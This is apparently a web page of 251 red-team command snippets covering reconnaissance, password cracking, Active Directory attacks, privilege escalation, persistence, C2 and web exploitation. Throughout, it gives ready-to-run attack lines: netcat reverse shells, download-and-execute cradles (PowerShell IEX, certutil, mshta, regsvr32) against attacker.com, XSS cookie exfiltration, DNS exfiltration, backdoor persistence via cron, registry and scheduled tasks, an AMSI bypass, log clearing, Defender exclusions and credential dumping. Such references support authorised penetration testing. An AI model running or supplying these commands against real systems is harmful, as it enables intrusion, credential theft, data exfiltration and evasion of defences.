Nmap - Top 1000 TCP
Default scripts and service detection on common ports. ↗
nmap -sC -sV -oN nmap.txt <target>Red Team Commands
251 curated command snippets for security professionals
Quick Filters:
Showing 251 of 251 commands
Nmap - All TCP ports
Full TCP sweep. ↗
nmap -p- -T4 -oN nmap-all.txt <target>Nmap - UDP Top 100
Fast UDP reconnaissance.
nmap -sU --top-ports 100 -oN nmap-udp.txt <target>Naabu - Quick ports
ProjectDiscovery port scan. ↗
naabu -host <target> -p - | tee ports.txthttpx - Probe live hosts
Web probe with status, title, and tech. ↗
cat hosts.txt | httpx -status-code -title -tech-detect -o alive.txtffuf - Directory brute force
Discover hidden paths. ↗
ffuf -u https://<host>/FUZZ -w /path/wordlist.txt -fc 404 -o ffuf.jsondirsearch - Content discovery
Fast content discovery. ↗
dirsearch -u https://<host> -e php,aspx,js -x 403,404waybackurls - Archived paths
Enumerate archived URLs.
echo <domain> | waybackurls | tee urls.txtgau - Gather URLs
Collect historical URLs. ↗
echo <domain> | gau --subs | tee urls.txtamass - Passive subdomains
Passive subdomain enumeration. ↗
amass enum -passive -d <domain> -o subs.txtsubfinder - Subdomains
Fast passive subdomain discovery. ↗
subfinder -d <domain> -all -silent | tee subs.txtNuclei - CVE templates
Template-based vuln checks. ↗
nuclei -l urls.txt -t cves/ -o nuclei-cves.txtNikto - Web scanner
Identify common misconfigs. ↗
nikto -h https://<host> -ssl -o nikto.txtWappalyzer - CLI
Identify technologies.
wappalyzer https://<host>whatweb - Fingerprint
Website fingerprinting.
whatweb https://<host>sqlmap - Test parameter
Automated SQL injection. ↗
sqlmap -u 'https://<host>/item?id=1' --batch --risk=2 --level=2Burp Suite - Proxy CA
Set up interception for web testing.
# Import Burp CA into browser to intercept TLSwpscan - WordPress
WordPress enumeration.
wpscan --url https://<host> --enumerate u,vt,tt --api-token <token>joomscan - Joomla!
Joomla scanner.
joomscan -u https://<host>droopescan - Drupal
Drupal scanner.
droopescan scan drupal -u https://<host>Hashcat - NTLM mask brute
NTLM cracking with mask attack (8 chars). ↗
hashcat -m 1000 hashes.txt ?a?a?a?a?a?a?a?a -O --forceHashcat - Rules attack
Smart candidate generation via rules.
hashcat -m 0 hashes.txt rockyou.txt -r rules/best64.rule -OJohn - Single crack
John the Ripper single crack mode.
john --single --format=NT hashes.txtKerbrute - User enum
Enumerate AD users via Kerberos. ↗
kerbrute userenum --dc <dc-ip> -d <domain> users.txtRubeus - Kerberoast
Request service tickets for SPNs. ↗
Rubeus kerberoast /nowrapmimikatz - dump creds
Dump credentials from memory. ↗
privilege::debug
sekurlsa::logonpasswordsSharpHound - Collect
Collect AD data for BloodHound. ↗
SharpHound.exe -c AllResponder - Poison
LLMNR/NBT-NS/mDNS poisoning. ↗
responder -I eth0 -wrfImpacket - psexec
Execute commands over SMB. ↗
psexec.py <domain>/<user>:<pass>@<target>CrackMapExec - Spray
Password spraying across SMB. ↗
cme smb <subnet> -u users.txt -p 'Winter2025!' --no-bruteforceEvil-WinRM - Shell
WinRM shell access.
evil-winrm -i <ip> -u <user> -p <pass>Metasploit - Search
Search modules from CLI. ↗
msfconsole -q -x 'search type:exploit name:<term>; exit'Metasploit - Handler
Start a payload handler.
use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST <ip>; set LPORT 4444; runsearchsploit - Query
Search EDB vulnerabilities. ↗
searchsploit <software> <version>Linux - SUID find
Find SUID binaries for privesc.
find / -perm -4000 -type f 2>/dev/nullLinux - Capabilities
Enumerate Linux capabilities.
getcap -r / 2>/dev/nullLinPEAS - Privesc
Automated Linux privesc enumeration. ↗
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh && chmod +x linpeas.sh && ./linpeas.shWindows - Unquoted services
Identify unquoted service paths.
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\\Windows\\" | findstr /i /v '"' PowerUp - Checks
Windows privesc checks. ↗
powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"Aircrack-ng - Monitor mode
Enable monitor mode on wireless interface. ↗
airmon-ng start wlan0Aircrack-ng - Capture handshake
Capture WPA handshake.
airodump-ng -c <channel> --bssid <AP_MAC> -w capture wlan0monAircrack-ng - Crack WPA
Crack WPA using wordlist.
aircrack-ng -w rockyou.txt -b <AP_MAC> capture*.capWireshark - CLI capture
Capture packets with tshark. ↗
tshark -i eth0 -w capture.pcaptcpdump - Capture to file
Packet capture with tcpdump.
tcpdump -i eth0 -w capture.pcapBettercap - ARP spoof
ARP spoofing and sniffing. ↗
bettercap -iface eth0 -eval 'set arp.spoof.targets <target>; arp.spoof on; net.sniff on'Scapy - Packet craft
Interactive packet manipulation (Python). ↗
scapyHydra - SSH brute
Brute force SSH credentials. ↗
hydra -l <user> -P passwords.txt ssh://<target>Hydra - HTTP POST
Brute force web login.
hydra -l <user> -P passwords.txt <target> http-post-form '/login:username=^USER^&password=^PASS^:F=incorrect'Burp Intruder - Position
Mark injection points in Burp Suite.
# Use Burp Intruder with §markers§ for payloadsXSS - Basic payload
Simple XSS proof of concept.
<script>alert(document.domain)</script>XSS - Steal cookies
Exfiltrate cookies via XSS.
<script>fetch('https://attacker.com/?c='+document.cookie)</script>SQLi - Union query
Extract data via SQL injection.
' UNION SELECT null,username,password FROM users--SQLi - Error-based
Trigger error messages for enumeration.
' AND 1=convert(int,(SELECT @@version))--SSRF - AWS metadata
Access AWS instance metadata.
http://169.254.169.254/latest/meta-data/AWS CLI - List S3 buckets
Enumerate S3 buckets. ↗
aws s3 ls --profile <profile>AWS CLI - Public bucket check
Test for public S3 access.
aws s3 ls s3://<bucket> --no-sign-requestkubectl - List pods
List all pods in all namespaces. ↗
kubectl get pods -Akubectl - Exec into pod
Interactive shell in pod.
kubectl exec -it <pod-name> -n <namespace> -- /bin/bashDocker - Escape check
Check if inside a container.
cat /proc/1/cgroup | grep dockerDocker - Mount host
Mount host filesystem in container.
docker run -v /:/host -it ubuntu chroot /hostAzure CLI - List VMs
Enumerate Azure VMs. ↗
az vm list --output tableGCP - List projects
List GCP projects. ↗
gcloud projects listPacu - AWS exploit
AWS exploitation framework. ↗
pacuScoutSuite - Cloud audit
Multi-cloud security audit. ↗
scout aws --profile <profile>Volatility - Image info
Identify memory profile. ↗
volatility -f memory.dmp imageinfoVolatility - List processes
List running processes from memory.
volatility -f memory.dmp --profile=<profile> pslistAutopsy - Timeline
Launch Autopsy GUI for disk analysis. ↗
autopsyFTK Imager - Acquire
Create bit-by-bit disk images.
# Use FTK Imager GUI to create forensic imagesdd - Disk image
Create raw disk image.
dd if=/dev/sda of=disk.img bs=4M status=progressbinwalk - Extract firmware
Extract embedded files from firmware. ↗
binwalk -e firmware.binstrings - Extract text
Find printable strings in binary.
strings -n 10 binary | lessltrace - Library calls
Trace library calls.
ltrace ./binarystrace - System calls
Trace system calls.
strace ./binaryGhidra - Decompile
Static analysis with Ghidra. ↗
# Import binary into Ghidra and analyzeradare2 - Disassemble
Disassemble and analyze binary. ↗
r2 -A binaryobjdump - Disasm section
Disassemble with objdump.
objdump -d -M intel binaryADB - List devices
List connected Android devices. ↗
adb devicesADB - Pull APK
Extract APK from device.
adb pull /data/app/<package>/base.apkapktool - Decompile APK
Decompile APK resources. ↗
apktool d app.apkFrida - Trace Android
Trace Android method calls. ↗
frida-trace -U -i '*decrypt*' <package>objection - iOS explore
Runtime instrumentation for iOS.
objection -g <app> exploreSSH - Local port forward
Forward remote port to local.
ssh -L 8080:localhost:80 user@remoteSSH - Dynamic SOCKS
Create SOCKS proxy via SSH.
ssh -D 9050 user@remoteChisel - Reverse tunnel
Reverse port forwarding. ↗
chisel server -p 8080 --reversesocat - Port relay
Relay traffic between ports.
socat TCP-LISTEN:8080,fork TCP:<target>:80proxychains - Route through SOCKS
Route tools through SOCKS proxy.
proxychains nmap -sT <target>Ligolo-ng - Pivot agent
Modern tunneling for pivoting. ↗
ligolo-ng -selfcertEmpire - Listener
Start Empire C2 listener. ↗
uselistener httpCovenant - Grunt
Create agent for Covenant C2. ↗
# Generate Grunt payload in Covenant UIGophish - Start server
Launch Gophish phishing framework. ↗
gophishSET - Credential harvester
Social Engineering Toolkit. ↗
setoolkitEvilginx2 - Phishlet
MitM phishing with 2FA bypass. ↗
evilginx2 -p phishlets/curl - Exfil via DNS
Exfiltrate data via DNS.
curl http://$(whoami).attacker.comnc - Reverse shell
Netcat reverse shell.
nc -e /bin/bash attacker.com 4444PowerShell - Download
Download and execute PowerShell.
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')"certutil - Download file
Download using certutil.
certutil -urlcache -f http://attacker.com/file.exe file.exebitsadmin - Download
Background download on Windows.
bitsadmin /transfer job http://attacker.com/file.exe C:\temp\file.exemshta - Execute HTA
Execute HTA payload.
mshta http://attacker.com/payload.htaregsvr32 - Squiblydoo
Execute scriptlet via regsvr32.
regsvr32 /u /n /s /i:http://attacker.com/file.sct scrobj.dllCron - Persistence
Add cron job for persistence.
(crontab -l; echo '@reboot /path/to/backdoor') | crontab -Systemd - Service persistence
Linux persistence via systemd.
# Create service file in /etc/systemd/system/Registry - Run key
Windows persistence via registry.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe"Scheduled Task - Persist
Windows persistence via task.
schtasks /create /tn "Update" /tr "C:\backdoor.exe" /sc onlogonWMI - Event subscription
Persistence via WMI.
# Use wmic or PowerShell to create WMI event subscriptionLaZagne - Dump passwords
Extract stored credentials. ↗
laZagne.exe allSecretsdump - Remote
Dump hashes remotely.
secretsdump.py <domain>/<user>:<pass>@<target>PsExec - Remote exec
Remote command execution.
psexec.py <domain>/<user>:<pass>@<target> cmd.exeWMIExec - Remote exec
Execute via WMI.
wmiexec.py <domain>/<user>:<pass>@<target>SMBExec - Remote exec
Execute via SMB.
smbexec.py <domain>/<user>:<pass>@<target>rpcclient - Enum users
Enumerate domain users.
rpcclient -U '' -N <target> -c 'enumdomusers'enum4linux - Full enum
Comprehensive SMB enumeration. ↗
enum4linux -a <target>smbclient - List shares
List SMB shares.
smbclient -L //<target> -Nsmbmap - Enum shares
Enumerate SMB share permissions. ↗
smbmap -H <target>BloodHound - Ingest data
Analyze AD attack paths. ↗
# Import SharpHound JSON into BloodHoundMasscan - Internet scan
High-speed port scanner. ↗
masscan -p80,443 0.0.0.0/0 --rate 10000Shodan - CLI search
Search Shodan from CLI. ↗
shodan search 'product:apache'theHarvester - Email enum
Gather emails and subdomains. ↗
theHarvester -d <domain> -b allRecon-ng - Workspace
OSINT reconnaissance framework. ↗
recon-ng -w <workspace>SpiderFoot - Auto OSINT
Automated OSINT collection. ↗
spiderfoot -s <target>DNSRecon - Full enum
Comprehensive DNS enumeration.
dnsrecon -d <domain> -t axfr,brt,srv,stdFierce - DNS brute
DNS reconnaissance and brute force.
fierce --domain <domain>dig - AXFR attempt
Attempt zone transfer.
dig axfr @<nameserver> <domain>nslookup - Reverse lookup
Reverse DNS lookup.
nslookup <ip>whois - Domain info
Query domain registration info.
whois <domain>LDAP - Anonymous bind
Anonymous LDAP enumeration.
ldapsearch -x -H ldap://<target> -b 'dc=domain,dc=com'ldapdomaindump - Extract AD
Dump AD via LDAP. ↗
ldapdomaindump -u '<domain>\<user>' -p <pass> <dc-ip>ADExplorer - Snapshot
Offline AD browsing.
# Create AD snapshot in ADExplorer GUIPowerView - Get users
Enumerate AD users. ↗
powershell -c "Import-Module .\PowerView.ps1; Get-DomainUser"PowerView - Find shares
Find accessible shares.
powershell -c "Import-Module .\PowerView.ps1; Invoke-ShareFinder"Invoke-Kerberoast
Kerberoast attack.
powershell -c "Import-Module .\PowerView.ps1; Invoke-Kerberoast -OutputFormat Hashcat"AS-REP Roast
AS-REP roasting for users without preauth. ↗
GetNPUsers.py <domain>/ -usersfile users.txt -dc-ip <dc-ip>Constrained delegation
Abuse constrained delegation.
getST.py -spn <service>/<host> -impersonate Administrator <domain>/<user>:<pass>DCShadow - Register
Advanced AD persistence.
# Use mimikatz DCShadow to register rogue DCNTLM relay - responder + ntlmrelayx
Relay NTLM auth to targets. ↗
ntlmrelayx.py -tf targets.txt -smb2supportCoercer - Force auth
Coerce authentication from target. ↗
coercer -u <user> -p <pass> -d <domain> -t <target> -l <listener>PetitPotam - Coerce
EFSRPC coercion. ↗
PetitPotam.py <listener> <target>PrinterBug - Coerce
Printer bug coercion.
printerbug.py <domain>/<user>:<pass>@<target> <listener>certipy - Find vuln templates
Find vulnerable AD CS templates. ↗
certipy find -u <user>@<domain> -p <pass> -dc-ip <dc-ip> -vulnerableCertify - Enum templates
Enumerate AD CS vulnerabilities. ↗
Certify.exe find /vulnerableCommix - Command injection
Automated command injection. ↗
commix --url='http://<target>/page?param=1'NoSQLMap - NoSQL injection
NoSQL injection testing. ↗
nosqlmap -t http://<target> -p paramXXEinjector - XXE
XXE exploitation. ↗
xxeinjector --host=<target> --path=/ --file=xml.xml --oob=http --phpfiltertplmap - SSTI
Server-side template injection. ↗
tplmap -u 'http://<target>?name=*'Arjun - Param discovery
HTTP parameter discovery. ↗
arjun -u https://<target>ParamSpider - URL params
Mine parameters from archives. ↗
paramspider -d <domain>Dalfox - XSS scanner
Fast XSS scanner. ↗
dalfox url https://<target>?param=testXSStrike - XSS
Advanced XSS detection. ↗
xsstrike -u 'http://<target>?param=1'JWT_Tool - Analyze token
Test JWT security. ↗
jwt_tool <token>GraphQL - Introspection
Query GraphQL schema.
curl -X POST https://<target>/graphql -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}'Postman - API test
API development and testing.
# Use Postman for API testingSwagger - API docs
Discover API documentation.
# Access /swagger or /api-docs endpointCORS - Test config
Test CORS configuration.
curl -H "Origin: https://evil.com" https://<target> -ICSRF - PoC
CSRF proof of concept.
<form action="https://<target>/action" method="POST"><input type="hidden" name="param" value="value"/></form><script>document.forms[0].submit()</script>Clickjacking - PoC
Clickjacking test.
<iframe src="https://<target>" style="opacity:0.1;position:absolute;top:0;left:0;width:100%;height:100%"></iframe>SSRF - Bypass localhost
SSRF localhost bypass techniques.
http://127.0.0.1/ or http://[::1]/ or http://localhost.attacker.comLFI - /etc/passwd
Local file inclusion test.
../../../etc/passwdLFI - PHP filter
Extract PHP source via filter.
php://filter/convert.base64-encode/resource=index.phpRFI - Remote include
Remote file inclusion.
http://attacker.com/shell.txtFile upload - Bypass extension
Bypass upload filters.
shell.php.jpg or shell.phtml or .htaccess tricksPolyglot file
Bypass content-type validation.
# Create file valid as multiple types (JPEG + PHP)Deserialization - PHP
PHP object injection.
O:8:"stdClass":1:{s:4:"test";s:4:"pwnd";}Java deserialization - ysoserial
Generate Java gadget chains. ↗
java -jar ysoserial.jar CommonsCollections5 'calc'LDAP injection
LDAP injection payload.
*)(&(password=*) or *)(cn=*XML bomb
XML entity expansion DoS.
<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;">]><lolz>&lol2;</lolz>Base64 encode
Encode payload in base64.
echo -n 'payload' | base64Base64 decode
Decode base64.
echo 'cGF5bG9hZA==' | base64 -dURL encode
URL encoding for bypass.
# Use %20 for space, %3C for <, etc.Unicode encode
Unicode encoding bypass.
# Use \u0061 for 'a', etc.HTML entities
HTML entity encoding.
<script> for <script>PowerShell - Base64 cmd
Execute encoded PowerShell.
powershell -enc <base64>PowerShell - Download cradle
Download and execute.
powershell -c "IEX(IWR http://attacker.com/s -UseBasicParsing)"AMSI bypass - patching
Bypass AMSI in memory.
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)Invoke-Obfuscation
Obfuscate PowerShell scripts. ↗
# Use Invoke-Obfuscation.ps1 to obfuscate scriptsDonut - Shellcode gen
Generate position-independent shellcode. ↗
donut -f <exe> -o shellcode.binVeil - AV evasion
Generate AV-evading payloads. ↗
veilShellter - Inject shellcode
Inject shellcode into PE. ↗
shelltermsfvenom - Payload gen
Generate Metasploit payload. ↗
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o payload.exemsfvenom - Encoder
Encode payload to evade signatures.
msfvenom -p <payload> -e x86/shikata_ga_nai -i 10Cobalt Strike - Beacon
Create CS agent.
# Generate Cobalt Strike beaconSliver - Implant
Generate Sliver implant. ↗
generate --http <domain> --save /tmp/implantC2 redirector - socat
Simple C2 redirector.
socat TCP4-LISTEN:80,fork TCP4:<c2-server>:80Domain fronting - CDN
Evade detection via domain fronting.
# Use CDN domain with Host header to real C2DNS tunneling - dnscat2
Tunnel over DNS. ↗
dnscat2-server <domain>ICMP tunnel - ptunnel
Tunnel over ICMP.
ptunnel -p <proxy> -lp <lport> -da <dest> -dp <dport>HTTP/S beacon - malleable
Customize beacon traffic.
# Use Cobalt Strike malleable C2 profilesLiving off the land - LOLBins
Evade detection using system tools. ↗
# Use built-in Windows binaries for executionPowerShell - AMSI log bypass
Clear PowerShell logs.
[Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog('Microsoft-Windows-PowerShell/Operational')Windows Defender - Exclusion
Add Defender exclusion.
Add-MpPreference -ExclusionPath "C:\payload"AppLocker bypass - regsvr32
Bypass AppLocker.
regsvr32 /s /n /u /i:http://attacker.com/file.sct scrobj.dllProcess injection - CreateRemoteThread
Classic process injection.
# Use Windows API CreateRemoteThreadProcess hollowing
Process hollowing technique.
# Create suspended process, unmap, write payload, resumeReflective DLL injection
Reflective DLL loading. ↗
# Load DLL from memory without diskAPC injection
APC queue injection.
# Queue APC to thread for executionThread hijacking
Hijack existing thread.
# Suspend thread, set context, resumePE injection - Manual map
Manual PE mapping.
# Manually map PE sections into memoryParent PID spoofing
Spoof parent process ID.
# Use UpdateProcThreadAttribute to spoof parentToken impersonation
Impersonate user token.
# Use ImpersonateLoggedOnUser APIToken duplication
Duplicate access token.
# Duplicate token with DuplicateTokenExSeDebugPrivilege enable
Enable debug privilege.
# Enable SeDebugPrivilege for process accessCredential dumping - lsass
Extract credentials from lsass.
# Dump lsass.exe memory for credentialsSAM database dump
Dump SAM and SYSTEM hives.
reg save HKLM\SAM sam.hive && reg save HKLM\SYSTEM system.hiveDPAPI - MasterKey
Decrypt DPAPI protected data.
# Extract DPAPI master keysBrowser creds - SharpWeb
Extract browser credentials. ↗
SharpWeb.exeVault creds - VaultCmd
List Windows Vault credentials.
VaultCmd.exe /listDocker escape - Privileged
Escape privileged Docker container.
# Mount host filesystem in privileged containerDocker - Host mount
Access host filesystem.
docker run -v /:/hostfs -it alpine chroot /hostfsKubernetes - Privesc via token
Escalate via K8s service account.
# Use service account token for API accessKubernetes - HostPath mount
Access host filesystem from pod.
# Mount host paths in pod specKubernetes - Exec into pod
Shell into running pod.
kubectl exec -it <pod> -- /bin/bashContainer - Capabilities abuse
Abuse Linux capabilities.
# Use CAP_SYS_ADMIN for escapeCloud - AWS metadata SSRF
Extract AWS credentials via SSRF.
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/Cloud - Azure metadata
Query Azure metadata.
curl -H Metadata:true 'http://169.254.169.254/metadata/instance?api-version=2021-02-01'Cloud - GCP metadata
Query GCP metadata.
curl 'http://metadata.google.internal/computeMetadata/v1/instance/?recursive=true' -H 'Metadata-Flavor: Google'Cloud - S3 bucket enum
List public S3 bucket.
aws s3 ls s3://<bucket> --no-sign-requestGit - Search secrets
Find secrets in Git history. ↗
trufflehog git https://github.com/org/repoGit - Gitleaks
Detect secrets in Git repos. ↗
gitleaks detect --source . -vGitHub - Dorking
GitHub dork for secrets.
# Search: org:target password OR tokenENV files - Search
Find .env files with secrets.
find / -name ".env" 2>/dev/nullTerraform - State file
Extract secrets from Terraform state.
# Check terraform.tfstate for secretsAnsible - Vault
Decrypt Ansible Vault.
ansible-vault decrypt vault.ymlCI/CD - Jenkins creds
Extract Jenkins credentials.
# Access /script console or credentials storeCI/CD - GitLab CI secrets
Find secrets in GitLab CI config.
# Check .gitlab-ci.yml for hardcoded secretsCI/CD - GitHub Actions
Check GitHub Actions for secrets.
# Review workflow files for secretsCI/CD - Pipeline abuse
Compromise CI/CD pipeline.
# Inject malicious steps into CI pipelineSupply chain - Dependency confusion
Dependency confusion attack.
# Upload malicious package to public repo with same nameNPM - Typosquatting
Typosquatting attack.
# Register typo of popular packagePyPI - Malicious package
Publish malicious PyPI package.
# Upload malicious Python packageAPI - Rate limit bypass
Bypass API rate limits.
# Use multiple IPs or tokensAPI - Mass assignment
Exploit mass assignment.
# POST {"isAdmin": true}API - IDOR
Insecure Direct Object Reference.
# Change /api/user/123 to /api/user/124API - GraphQL batching
GraphQL batching abuse.
# Send batched queries to bypass rate limitsCache poisoning - Web cache
Web cache poisoning.
# Inject malicious header: X-Forwarded-Host: evil.comCache poisoning - Unkeyed header
Exploit unkeyed headers.
# Find unkeyed headers affecting responseHTTP request smuggling - CL.TE
CL.TE request smuggling.
# Content-Length vs Transfer-EncodingHTTP request smuggling - TE.CL
TE.CL request smuggling.
# Transfer-Encoding vs Content-LengthHTTP/2 - Request smuggling
HTTP/2 downgrade smuggling.
# Downgrade to HTTP/1.1 with smugglingWebSocket - Hijacking
WebSocket CSRF.
# CSRF on WebSocket handshakeWebSocket - Message injection
WebSocket message injection.
# Inject malicious messages: {"cmd":"admin"}Prototype pollution - JS
JavaScript prototype pollution.
__proto__.isAdmin = truePrototype pollution - JSON
Exploit via JSON payload.
{"__proto__":{"isAdmin":true}}Server-side prototype pollution
Server-side prototype pollution.
# Pollute global object on Node.js serverRace condition - TOCTOU
Race condition exploit.
# Time-of-check to time-of-use exploitRace condition - Burp Intruder
Automated race condition.
# Use single-packet attack in IntruderBusiness logic - Discount abuse
Abuse discount codes.
# Apply coupon multiple timesBusiness logic - Negative quantity
Negative quantity exploit.
# POST {"qty": -1}SSRF - Blind
Blind SSRF detection.
# Trigger DNS/HTTP request to attackerSSRF - Cloud metadata XXE
Combine XXE + SSRF for cloud metadata.
# XXE payload to fetch cloud metadataXXE - File read
XXE to read local files.
<!ENTITY xxe SYSTEM "file:///etc/passwd">XXE - Blind OOB
Blind XXE with OOB.
<!ENTITY % xxe SYSTEM "http://attacker.com/?data=%file;">SSTI - Jinja2
Server-Side Template Injection (Jinja2).
{{config.items()}}SSTI - Twig RCE
Twig SSTI RCE.
{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}